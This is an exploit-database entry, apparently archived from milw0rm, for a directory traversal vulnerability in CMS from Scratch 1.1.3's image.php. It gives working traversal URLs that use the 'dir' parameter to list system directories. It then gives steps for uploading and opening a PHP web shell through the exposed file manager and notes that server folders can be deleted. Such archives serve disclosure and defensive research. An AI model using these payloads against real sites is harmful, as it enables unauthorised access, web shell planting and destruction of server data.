[] NeoSense

CMS from Scratch 1.1.3 - 'image.php' Directory Traversal

Author: Stack
type: webapps
platform: php
port: 
date_added: 2008-05-28 
date_updated: 2016-12-01 
verified: 1 
codes: OSVDB-45753;OSVDB-45752;OSVDB-45751;OSVDB-45750 
tags: 
aliases:  
screenshot_url:  
application_url: 

------------------------------------------------------------------------
   CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
------------------------------------------------------------------------

   author...: Stack
 mail.....: Wanted
 wanted by Egix
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)

Exploit :
        #  http://localhost/path/cms/images.php?dir=c:
        Example :
        #  http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/

Exploit 2 :

          and you can upload php file ==>  php shell
          for example upload the php shell in my localhost
         c:AppServ/www/
         you go to link
        #  http://localhost/path/cms/images.php?dir=c:AppServ/www/
         after click to colon [parcourir] after select your shell and click upload
         and go to link
        #  http://localhost/shell.php
      desc :you can delete all folder of server
      just clike to mark delete in folder selected to delete

 thx : allah

# milw0rm.com [2008-05-29]